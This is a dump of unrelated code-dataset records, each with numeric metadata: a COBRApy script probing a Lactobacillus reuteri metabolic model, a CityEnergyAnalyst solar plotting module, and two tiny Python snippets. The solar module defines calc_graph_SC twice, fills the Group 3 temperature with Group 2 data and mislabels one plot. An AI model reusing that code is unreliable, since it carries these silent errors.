model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('ppoh_c').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <1,3-propanediol ~> TODO:
met_i = Lreu_draft_3_refined.metabolites.get_by_id('13ppd_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
# Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPN13D'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('PPDt1'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_13ppd_e'))
# Lreu_draft_3_refined.reactions.get_by_id('EX_glyc_e').bounds = (0,1000)
Lreu_draft_3_refined.reactions.get_by_id('EX_13ppd_e').bounds = (0, 1000)
objective_rea = 'EX_13ppd_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# Y = Lreu_draft_3_refined.optimize().objective_value * Lreu_draft_3_refined.metabolites.get_by_id('13ppd_e').formula_weight\
# /(10*Lreu_draft_3_refined.metabolites.get_by_id('glc__D_e').formula_weight )
# solution = Lreu_draft_3_refined.optimize()
# print(Y)
# My_def.io_file.solution2txt(solution,Lreu_draft_3_refined,'Lreu_draft_3_refined_temp_flux.txt')
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517,iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('13ppd_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %%<reuterin : 3 hydroxypropionaldehyde, 3-HPA,3 hydroxypropanal, 3hppnl> : TODO: 3hppnl
met_i = Lreu_draft_3_refined.metabolites.get_by_id('3hpp_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('3HPPt'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('EX_3hpp_e'))
objective_rea = 'EX_3hpp_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
for model_i in [Lreu_draft_3_refined, Lreuteri_530, ]: # iNF517,iML1515,
model = model_i.copy()
model.reactions.get_by_id('EX_glc__D_e').bounds = (-25, 1000)
model.reactions.get_by_id(objective_rea).bounds = (0, 1000)
model.reactions.get_by_id('ATPM').bounds = (0, 1000)
model.reactions.get_by_id('PFK').bounds = (0, 1000) # NOTE: Lreuteri_530 is(-1000,2)
try:
# other carbon:
model.reactions.get_by_id('EX_cys__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_gly_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ala__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_leu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ile__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_thr__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_arg__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asn__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_asp__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_glu__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_ser__L_e').bounds = (0, 1000)
# other limations:
model.reactions.get_by_id('EX_etoh_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_lac__L_e').bounds = (0, 1000)
model.reactions.get_by_id('EX_o2_e').bounds = (0, 1000)
except:
pass
# rea = cobra.Reaction('NADHM')
# model.add_reaction(rea)
# model.reactions.get_by_id('NADHM').reaction = 'nadh_c + h_c --> nad_c'
# model.objective = 'NADHM'
model.objective = objective_rea
# iML1515: 13PPDH2
solution = model.optimize()
print(model.id, solution.objective_value)
obj_value = solution.objective_value
Y_g_g = obj_value * model.metabolites.get_by_id('3hpp_e').formula_weight \
/ (25 * model.metabolites.get_by_id('glc__D_e').formula_weight)
Y_c = obj_value * 3 / (25 * 6)
print('Y_g_g: ', Y_g_g, 'T_c: ', Y_c)
solution = cobra.flux_analysis.pfba(model) # model.optimize()
My_def.io_file.solution2txt(solution, model, model.id + '_temp_flux.txt')
# %% <Histamine hista_c>
met_i = Lreu_draft_3_refined.metabolites.get_by_id('hista_c')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
# Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISDC'))
Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISTAap'))
rea = cobra.Reaction('EX_hista_e')
Lreu_draft_3_refined.add_reaction(rea)
Lreu_draft_3_refined.reactions.get_by_id('EX_hista_e').reaction = 'hista_e --> '
objective_rea = 'EX_hista_e'
Lreu_draft_3_refined.objective = objective_rea
Lreu_draft_3_refined.reactions.get_by_id('EX_his__L_e').bounds = (-5, 1000)
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <vitamin B12: cobalamin> TODO: Adenosylcobalamin, adocbl TODO :gap!!!!
# objectiverea = 'EX_adocbl_e'
# Lreu_draft_3_refined.objective = objectiverea
# print('Lreu opt value: ',Lreu_draft_3_refined.optimize().objective_value)
#
# Lreuteri_530.objective = objectiverea
# Lreuteri_530.optimize()
# NOTE in adocbl named adeadocbl, the pathway is not reliable.
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('ADOCBLS'))
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('RZ5PP'))
# Lreu_draft_3_refined.add_reaction(iML1515.reactions.get_by_id('NNDMBRT'))
#
# # Lreu_draft_3_refined.add_reaction(Lreuteri_530.reactions.get_by_id('HISTAap'))
#
# rea1 = cobra.Reaction('ADOCBLt')
# rea2 = cobra.Reaction('EX_adocbl_e')
# Lreu_draft_3_refined.add_reaction(rea1)
# Lreu_draft_3_refined.add_reaction(rea2)
# Lreu_draft_3_refined.reactions.get_by_id('ADOCBLt').reaction = 'adocbl_c --> adocbl_e'
# Lreu_draft_3_refined.reactions.get_by_id('EX_adocbl_e').reaction = 'adocbl_e --> '
# objectiverea = 'ADOCBLS'#'EX_adocbl_e'
# Lreu_draft_3_refined.objective = objectiverea
# print('Lreu opt value: ',Lreu_draft_3_refined.optimize().objective_value)
# iML1515.objective = 'BIOMASS_Ec_iML1515_WT_75p37M'
# iML1515.optimize()
# # TODO adeadocbl_c --> c
# %% <vitamin B9 Folate > TODO: fol_c
met_i = Lreu_draft_3_refined.metabolites.get_by_id('fol_e')
print('\n', met_i.id, met_i.name, met_i.formula, met_i.annotation)
objective_rea = 'EX_fol_e' # 'EX_adocbl_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <EPS: exopolysaccharide > NOTE: no
# %% <other SCFAs>
# %%<others:>
# <Mannitol mnl_e>
objective_rea = 'EX_mnl_e' # 'EX_adocbl_e'
Lreu_draft_3_refined.objective = objective_rea
print('Lreu opt value: ', Lreu_draft_3_refined.optimize().objective_value)
# %% <output files>
for i in Lreu_draft_3_refined.metabolites:
if i.compartment not in ['c', 'e']:
i.compartment = i.id.split('_')[-1]
Lreu_draft_3_refined.reactions.get_by_id('BIOMASS').reaction
Lreu_draft_3_refined.objective = 'BIOMASS'
print('Lreu opt biomass value: ', Lreu_draft_3_refined.optimize().objective_value)
cobra.io.save_json_model(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.json')
My_def.io_file.model2txt(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.txt', sort=True)
cobra.io.write_sbml_model(Lreu_draft_3_refined, 'Lreu_draft_3_refined_part02.xml')
comd = ' memote report snapshot --filename "Lreu_draft_3_refined_part02.html" Lreu_draft_3_refined_part02.xml'
os.system(comd)
| 43.968
| 126
| 0.70756
| 3,567
| 21,984
| 3.941968
| 0.063639
| 0.065785
| 0.092099
| 0.185478
| 0.896451
| 0.888557
| 0.873764
| 0.857691
| 0.839414
| 0.828319
| 0
| 0.061703
| 0.147062
| 21,984
| 499
| 127
| 44.056112
| 0.688177
| 0.182724
| 0
| 0.781457
| 0
| 0
| 0.137301
| 0.025499
| 0
| 0
| 0
| 0.002004
| 0
| 1
| 0
| false
| 0.019868
| 0.009934
| 0
| 0.009934
| 0.099338
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0659b3217901c7e9d1f75a811a4542bf1d206536
| 13,512
|
py
|
Python
|
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | 1
|
2018-08-16T14:34:23.000Z
|
2018-08-16T14:34:23.000Z
|
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
cea/plots/old/graphs_solar_potential.py
|
pajotca/CityEnergyAnalyst
|
f3d0a08f7b5f5967961bf831625544a95c7702f0
|
[
"MIT"
] | null | null | null |
"""
Solar graphs
"""
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
__author__ = "Jimeno A. Fonseca"
__copyright__ = "Copyright 2015, Architecture and Building Systems - ETH Zurich"
__credits__ = ["Jimeno A. Fonseca"]
__license__ = "MIT"
__version__ = "0.1"
__maintainer__ = "Daren Thomas"
__email__ = "cea@arch.ethz.ch"
__status__ = "Production"
def calc_graph_I_sol(hourlydata_groups):
isolation = hourlydata_groups.rename(columns={0: 'Group 1', 1: 'Group 3', 2: 'Group 2'})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
isolation.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('Solar isolation (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
isolation[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('Solar isolation (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
isolation[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('Solar isolation (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
isolation[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('Solar isolation (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_PV(results,results_perarea):
PV_production = pd.DataFrame({'Group 1':results[0],'Group 2':results[2],'Group 3':results[1], 'Total':(results[0]+results[1]+results[2])})
PV_production_perarea = pd.DataFrame({'Group 1':results_perarea[0]*1000,'Group 2':results_perarea[2]*1000,'Group 3':results_perarea[1]*1000})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
PV_production_perarea.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PV_production_perarea[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PV_production_perarea[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PV_production_perarea[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('PV specific potential (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
PV_production.plot(ax = ax1); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('PV potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PV_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('PV potential (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PV_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('PV potential (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PV_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('PV potential (kW)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_SC(result ,prop_observers, number_points, Tin):
Area_group1 = prop_observers.loc[0,'area_netpv']*number_points[0]
Area_group2 = prop_observers.loc[1,'area_netpv']*number_points[1]
Area_group3 = prop_observers.loc[2,'area_netpv']*number_points[2]
SC_production = pd.DataFrame({'Group 1':result[0][1]/Area_group1*1000,'Group 2':result[2][1]/Area_group3*1000,'Group 3':result[1][1]/Area_group2*1000})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,600])); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True, ylim=([0,600])); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True, ylim=([0,200])); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('SC specific potential (W/m2)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
SC_production = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,25000])); ax1.set_title('Year',fontsize=25); ax1.set_ylabel('SC potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_production[4000:4200].plot(ax = ax2, legend =False, antialiased=True, ylim=([0,25000])); ax2.set_title('Summer',fontsize=25); ax2.set_ylabel('SC potential (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_production[1600:1800].plot(ax = ax3, legend =False, antialiased=True, ylim=([0,8000])); ax3.set_title('Intermediate season',fontsize=25); ax3.set_ylabel('SC potential (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_production[8300:8500].plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Winter',fontsize=25); ax4.set_ylabel('PV potential (kW)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
Toutvector = np.nan_to_num(np.divide((result[0][1]+result[2][1]+result[1][1]),(result[0][5]+result[2][5]+result[1][5])) + Tin)
SC_production = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
SC_losses = pd.DataFrame({'Group 1':result[0][0],'Group 2':result[2][0],'Group 3':result[1][0], 'Total':(result[0][0]+result[2][0]+result[1][0])})
SC_aux = pd.DataFrame({'Group 1':result[0][2],'Group 2':result[2][2],'Group 3':result[1][2], 'Total':(result[0][2]+result[2][2]+result[1][2])})
SC_Tout = pd.DataFrame({'Group 1':result[0][3],'Group 2':result[2][3],'Group 3':result[2][3], 'Total':Toutvector})
SC_mcp = pd.DataFrame({'Group 1':result[0][5],'Group 2':result[2][5],'Group 3':result[1][5], 'Total':(result[0][5]+result[2][5]+result[1][5])})
# <codecell>
fig, axes = plt.subplots(nrows = 2, ncols = 2, figsize=(32, 16), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]
SC_production.plot(ax = ax1, ylim=([0,20000])); ax1.set_title('Thermal Output',fontsize=25); ax1.set_ylabel('SC potential (kW)',fontsize=20);ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
SC_losses.plot(ax = ax2, legend =False, antialiased=True, ylim=([0,1000])); ax2.set_title('Thermal Losses',fontsize=25); ax2.set_ylabel('losses (kW)',fontsize=20);ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
SC_aux.plot(ax = ax3, legend =False, antialiased=True, ylim=([0,200])); ax3.set_title('Auxiliary electricity',fontsize=25); ax3.set_ylabel('Eaux (kW)',fontsize=20);ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
SC_Tout.plot(ax = ax4, legend =False, antialiased=True); ax4.set_title('Return temperature',fontsize=25); ax4.set_ylabel('Tout (C)',fontsize=20);ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
return
def calc_graph_SC(result, Tin):
Toutvector = np.nan_to_num(np.divide((result[0][1]+result[2][1]+result[1][1]),(result[0][5]+result[2][5]+result[1][5])) + Tin)
PVT_thermal_gen = pd.DataFrame({'Group 1':result[0][1],'Group 2':result[2][1],'Group 3':result[1][1], 'Total':(result[0][1]+result[2][1]+result[1][1])})
PVT_losses = pd.DataFrame({'Group 1':result[0][0],'Group 2':result[2][0],'Group 3':result[1][0], 'Total':(result[0][0]+result[2][0]+result[1][0])})
PVT_aux = pd.DataFrame({'Group 1':result[0][2],'Group 2':result[2][2],'Group 3':result[1][2], 'Total':(result[0][2]+result[2][2]+result[1][2])})
PVT_Tout = pd.DataFrame({'Group 1':result[0][3],'Group 2':result[2][3],'Group 3':result[2][3], 'Total':Toutvector})
PVT_mcp = pd.DataFrame({'Group 1':result[0][5],'Group 2':result[2][5],'Group 3':result[1][5], 'Total':(result[0][5]+result[2][5]+result[1][5])})
PVT_electrical_gen = pd.DataFrame({'Group 1':result[0][6],'Group 2':result[2][6],'Group 3':result[1][6], 'Total':(result[0][6]+result[2][6]+result[1][6])})
# <codecell>
fig, axes = plt.subplots(nrows = 3, ncols = 2, figsize=(32, 24), dpi=4200)
ax1 = axes[0,0]; ax2 = axes[0,1]; ax3 = axes[1,0]; ax4 = axes[1,1]; ax5 = axes[2,0]; ax6 = axes[2,1]
PVT_thermal_gen.plot(ax = ax1, ylim=([0,30000])); ax1.set_title('Thermal Output',fontsize=25); ax1.set_ylabel(r'$\Phi_{PVT,th}$'+' (kW)',fontsize = 30 );ax1.set_xlabel('Hour of the year',fontsize=20);ax1.tick_params(axis='x', labelsize=20);ax1.tick_params(axis='y', labelsize=20);ax1.legend(fontsize=20)
PVT_losses.plot(ax = ax2, legend =False, antialiased=True, ylim=([0,400])); ax2.set_title('Distribution thermal Losses',fontsize=25); ax2.set_ylabel(r'$\Phi_{PVT,dis,l}$'+' (kW)',fontsize = 30 );ax2.set_xlabel('Hour of the year',fontsize=20);ax2.tick_params(axis='x', labelsize=20);ax2.tick_params(axis='y', labelsize=20)
PVT_electrical_gen.plot(ax = ax3, legend =False, antialiased=True); ax3.set_title('Electrical Output',fontsize=25); ax3.set_ylabel(r'$\Phi_{PVT,e}$'+' (kW)',fontsize = 30 );ax3.set_xlabel('Hour of the year',fontsize=20);ax3.tick_params(axis='x', labelsize=20);ax3.tick_params(axis='y', labelsize=20)
PVT_aux.plot(ax = ax4, legend =False, antialiased=True, ylim=([0,200])); ax4.set_title('Auxiliary electricity',fontsize=25); ax4.set_ylabel(r'$\Phi_{PVT,aux}$'+' (kW)',fontsize = 30 );ax4.set_xlabel('Hour of the year',fontsize=20);ax4.tick_params(axis='x', labelsize=20);ax4.tick_params(axis='y', labelsize=20)
PVT_mcp.plot(ax = ax5, legend =False, antialiased=True); ax5.set_title('Capacity mass flow rate',fontsize=25); ax5.set_ylabel(r'$\.{mCp}$'+' (kW/C)',fontsize = 30 );ax5.set_xlabel('Hour of the year',fontsize=20);ax5.tick_params(axis='x', labelsize=20);ax5.tick_params(axis='y', labelsize=20)
PVT_Tout.plot(ax = ax6, legend =False, antialiased=True); ax6.set_title('Return temperature',fontsize=25); ax6.set_ylabel(r'$\mathit{T_{PVT, out}}$'+' (kW)',fontsize = 30 );ax6.set_xlabel('Hour of the year',fontsize=20);ax6.tick_params(axis='x', labelsize=20);ax6.tick_params(axis='y', labelsize=20)
return
| 116.482759
| 329
| 0.701377
| 2,297
| 13,512
| 4.006966
| 0.074445
| 0.066276
| 0.091265
| 0.048892
| 0.861256
| 0.839744
| 0.815732
| 0.790635
| 0.777597
| 0.771838
| 0
| 0.090364
| 0.086812
| 13,512
| 115
| 330
| 117.495652
| 0.655564
| 0.00259
| 0
| 0.238095
| 0
| 0
| 0.155851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.035714
| 0
| 0.130952
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
066c396f36bb46c0521fe991a90fcb4a2c2f663e
| 47
|
py
|
Python
|
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
moduler/__init__.py
|
sfairchild/moduler
|
a7b5c14ef65d03f524a67bb5460d4d447ccfbc72
|
[
"MIT"
] | null | null | null |
def run():
return (u'This still works!!!')
| 15.666667
| 35
| 0.574468
| 7
| 47
| 3.857143
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 47
| 2
| 36
| 23.5
| 0.72973
| 0
| 0
| 0
| 0
| 0
| 0.404255
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
06810e1bd19e4139bdc4f994025c8ca331e51848
| 460
|
py
|
Python
|
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | null | null | null |
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | 46
|
2017-06-30T22:19:07.000Z
|
2017-07-31T22:51:31.000Z
|
14/00/00/0.py
|
pylangstudy/201707
|
c1cc72667f1e0b6e8eef4ee85067d7fa4ca500b6
|
[
"CC0-1.0"
] | null | null | null |
import datetime
#print(int('100').__getattr__('abcdefg')) # AttributeError: 'int' object has no attribute '__getattr__'
#print(str('abc').__getattr__('abcdefg')) # AttributeError: 'str' object has no attribute '__getattr__'
#print(range(3).__getattr__('abcdefg')) # AttributeError: 'range' object has no attribute '__getattr__'
#print(datetime.datetime.now().__getattr__('abcdefg')) # AttributeError: 'datetime.datetime' object has no attribute '__getattr__'
| 65.714286
| 130
| 0.76087
| 52
| 460
| 6.115385
| 0.326923
| 0.176101
| 0.352201
| 0.251572
| 0.386792
| 0.301887
| 0
| 0
| 0
